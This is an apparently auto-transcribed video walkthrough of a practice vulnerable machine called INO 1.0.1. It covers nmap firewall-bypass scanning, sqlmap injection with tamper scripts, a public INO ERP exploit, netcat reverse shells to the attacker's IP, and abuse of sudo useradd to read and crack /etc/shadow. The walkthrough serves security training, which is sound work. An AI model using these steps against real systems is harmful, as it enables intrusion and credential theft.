Yo, what's going on, guys? In this video, we're going to be doing INO 1.0.1. I rate this box about an easy, overall pretty good box. It's pretty realistic because it does contain a firewall, which we do use nmap to do a stealth scan. And we also add a delay using SQL map. Yeah, guys, hope you guys enjoy. Alright, so since this is running a firewall, we are actually going to be running nmap, but instead of running doing enumeration for the versions and all of this stuff and doing regression scan, I'm also just going to run a stealth scan with the script, and what that script's going to be firewall bypass. So just to do that, we're going to do nmap minus ss, which stands for stealth scan. We do minus script, and then we're also going to do firewall bypass. And it's just going to enable our firewall bypass that we're going to be using with the script. And this is for the stealth scan. And then from there, we're just going to enter the IP address, which is 10.0.0.198. So, and this is all made just so we don't get detected by the firewall. So we're just going to press enter, and we do see we have a 22 open for SSH, 25, and HTTP. So next, since I already did the Go Buster before, I'm just going to copy and paste this. And here we're just going to enter the IP address, which was 10.0.0.198. And right here it does let us view our page, right? So if we didn't run this script firewall bypass, this would actually IP ban us for even visiting this, right? So next we're actually going to capture this request using naming the file .request using burp. So we're going to start with burp. I'm also going to enable the Foxy proxy on port 8080. So I'm going to close this, put next our burp. So here I'm just going to go to proxy, go to options. I'm just going to click here, edit. I'm going to put this as my specific address, which is my IP address of this machine. Go to proxy, go to intercept. And right here, if we go to, so if you do look up here, we have a lot reservation management. So I'm going to search up lot reservation, which was exploit db. Lot reservation manage db. And right here we do see that we have an exploit right here. So right here, since we do have the exploit title, which matches the lot reservation management 1.0, this is the same thing as we do see right there. And you do see that this is also under the lot reservation system, what's it called, /admin, right? Which is /admin right there for the subdirectory. And for this exploit, it does seem like we can use this payload right here. So instead of me trying out this payload for the username and password, we can use SQL map to automatically do that for us, right? Right here, it just showed that we can be logged in as admin for the application. But in this case, we're going to be listing the databases, and then we're going to be listing the tables, right? So from here, we do have our burp running right here. Let me just intercept this off again. Turn this here. For here, since we are going to be testing for our just SQL injection, we're going to open SQL map doing that, right? So we can just click login, and we do see that we have our username as admin and admin. And we do see it's admin.ajax.php. If you do go back, you do see that that was the same here. So that knows that, so now we know that we have the same version, which is 1.0. Here's the version also too. So here we can just copy, this to a file, which is, we can just name this, we'll put this under, let me just exit this out. Here, I'll just make a, we'll go to my desktop and we'll empty there into, we'll name this slot, cd into slot, clear this, and we'll put this under my desktop. Or it was under burp. So we can just copy this to file, And where is lot? Okay, so we are under the lot directory, and then from here we can just specify a name. We'll just name this I'll just name this manage.req, and this is going to save into our directory. So now we can cat manage.request. Always make sure you have your username and password field right here and the request. So we can Control-C of that. So now that we do have that, we're going to be using SQL map. So I'm going to be going under, just open a new terminal here real quick. So we're going to go under my desktop. So we're going to cd into lot, and we're also going to cat manage.request. Great. Alright guys, so I actually did make a little walkthrough for you guys, and the reason for that is actually just because when trying to display the databases, it's actually taking way too long to display each database. I even tried putting the time to 1, but this is the one I actually did. I actually put the delay to 2.5. I also just did all these commands, right? If you do look over here, you did see that I actually did put it under where's the command? I did run SQL map against .SQL. We can do .batch, tamper, and then we can do charm code. And where I got the scripts from to invade web application firewall bypass, I did look at the charm code, and you can also look under the MySQL right at this website. I'll just leave it down below too in the description. So I did find two of these exploit DBs. I did try finding this one, and that didn't work, so I actually decided I actually found this other one on exploit DB, and I actually copied this to a just copy the raw file, right? I'll just copy this. From here we can just do just duplicate that. Okay, and also let me explain these commands. So I actually did SQL map -r, which is going to be the request file, .SQL. We did batch, and we also did identify web application firewall. So it's going to identify what kind of firewall we're running, or the target's running, and then we dump all databases on there. We did the same thing. We went under the reference database, and we dumped that out. Same thing, we went under the data, we went under the reference database, and we dumped those tables from there. We did get our sites, and then from there we did dump the sites table, right? From there we did get the INO enterprise planning, and I did find out it was INO.ERP, and all I did was search up INO ERP exploit, and it came up with this right here. From searching this, we did go over here. We do have our exploits, so we can just do chmod +x exploit.py. Now we can do python exploit.py, and it does tell us to specify the params and format, right? So we can do python. We will specify the exploit.py. We'll do target, so we can just do http. And here I'm actually going to do nmap minus. We'll do aggressive scan to find to add this to our etc host. So 10.0.0154. So we're just going to let that scan. So we're going to go under the /etc. And for some reason, when I tried putting the IP address, it wouldn't let me. So I decided to put it under the host. So we can just cat_host or cat host. And you do see that we get shredder this, right? Which I found under the address right here. And that's what I put under this etc host file. So we can just copy this right here, and this is going to be under that directory that we saw, which was under the INO enterprise planning. So we can just copy that, and this is under www. It's also telling us to specify the attacker's IP. So here I'm going to be using all wrap. netcat minus LMVP, and we'll listen on port 5555. And we're gonna my IP address 10.0.023 and port 5555. And it seems like we do get a shell, so we can do ID, and we're www data. So cd back into cd back into home, clear that. Let me export term equals x term. cd into ppp. We can cat our local.txt. And there is our local.txt flag, right? So now we did that, right? The next thing I usually like doing, I have not done the privilege escalation, so I'm just gonna cancel this out since we already do have a connection. I like going to my documents, or I'll cd back, and I like going to my privilege escalation for linps, so we can cd into linps. Yeah, it was linps, and we can actually start a server on here. So you can do python 3 minus m http.server on port 8080. And we can start a server on there, right? So I like actually going to cd/dev/shm, because it's executable, and also I can run commands under here, right? Or this actually, it's empty, right? So you have nothing here, so it's a good place to run, right? So let me just actually do, I might have to run a new netcat session to run on a bigger terminal here. So we'll just do Python or wget, actually wget http 10.0.023. We can actually do this on port, was it 4545, and we're going to be getting our linpiece.sh. So we do ls, now we have our linpiece.sh cmod plus linpiece.sh, and we do have that, right? So I'm actually going to be getting a new connection from here, so we can just do netcat minus e. We're actually going to execute a bin bash on my IP 10.0.023 on port, we'll do this on 6666. So I'm just going to open a new terminal, do all wrap netcat minus LMVP on port 6666. We can press enter, and now we get a more just a better shell here, just to put this in full screen now, right? So we can cancel this out. Now we have a shell, so now we can export term equals x term. We can spawn a TTY. Actually, give us a shell. Actually, we didn't even need a TTY shell because we can just cd back. But we are under dev //shm. So and why don't you look at that? We have a directory that's under us. Cat. I think we found a, nope. Chap secrets. And we do have a password here, all right? So let's see if this is the password for that, for PPP. And that is the password for PvP. Okay. Alright, so now that we do have a password, right? Usually when you do have a password, you can actually start by running sudo -l to see what permissions you can run, or what binaries you can run, right? As root. And right here it does show that we can use a useradd right here. So I'm just gonna do sudo, and we can just copy and paste that, right? So here, for the minus groups options, we can actually list, we'll put a group, right? Well, I was thinking first to actually try to putting the group 0, which stands for root, and that didn't work, right? So I actually tried using the shadow group to read the shadow file, to crack the root password, right? So doing that, we can actually just run this as sudos. And we can run this as, or for useradd, right? We can do -g, and then for here, you're actually going to specify the user, right? So for the user that you want, you can put, I'm just going to put test3, and then we'll put in -p, which stands for minus password. Hey, I'll specify as minus password, so I don't get confused, so I know what means what, because I don't really memorize -g or -p, but here we can put minus password, but for the minus password, you can't really put a clear text password, so you would have to encrypt it, right? And to encrypt it, I think it's you can use well, the way I did it was I used Python 3, and I think it was I'm not sure what the type of hash it is, I totally forgot, but usually when I do this, I just import crypt. And once you import crypt, you can just do crypt.crypt, and then in between here, you actually want to specify the password that you're going to want to put in, right? Which is going to encrypt, right? So here I'm just going to put in pass123, and then I'm going to specify by a comma, right? And then I'll do AAA, and then we can press enter. And you do see that we do get a hash right here between the two codes, right? And here, instead of putting the clear password, you're going to want to put it under here, right? Groups. Actually, here, let me put this right here. Or I'll just put test3 right there, and then groups, we're actually going to put it under I believe it was 42, I think. Yeah, 42. And then for password, we can specify the password. Press enter. If you get no errors, you know that it ran successfully. So now we can switch users to test3. And you do see that our password was pass123, right? So now we can put that, or type in password 123 or pass123. You do ID, and now you do see that we are under 42, which stands for 0, right? I did try doing this for root, but it didn't work. So now we can cat/etc shadow right there. So now I'm just gonna exit out of our Python session right here. I'm gonna do SSH. We can do say test3 10.0.154. So we can do 154, and we do know the password is pass123. So from here, we can just cat out etc/password or shadow. You do see that we have a pass123 right here, right? And then we're also gonna actually transfer this file to our local machine. So we can just exit out of here. So I'm gonna go under, I'll just go under cd/ or cd desktop, and no cd lot. And here I'm going to start my Python server under the /etc. So we're going to move under that directory, python3 -m http.server. We're going to listen on port 8080, which is going to be the server. And right here, we're actually just going to do http, which is going to be our IP address right here. And then we're gonna listen. This is listening on port 8080, and we're gonna get our shadow pass, our shadow file. So we can press enter. Now we can cat into shadow, and you do see we have that right there. So here we can just control C out of that. Once we do that, we can actually start a. You can use hashcat or you can use John. I like using John because it's simpler. You can use, or you can use, I'm going to be using John, right? So I'm going to use John, and I usually put a space here because it lets me use tabs. So I use user share word list, rocku.txt, and I'm also going to specify shadow. We can put this back together right here, and we can press enter. All right, so after 4 minutes of just cracking, once it's done, you can do, it should actually just show you like root, and then it should show you the password right there, but I just cleared the terminal. Now I can do John -- show, and then you can also do the file right where the hash was located, and you do see that we have our password right here. So now we can just switch users to root, enter the password, switch users to root, and then we can just cat proof.txt. I was already in the root, my bad, but yeah, we can just cat the proof.txt, and there's our root flag. Well, guys, don't forget to like and subscribe, and I'll catch you guys in the next one. Peace.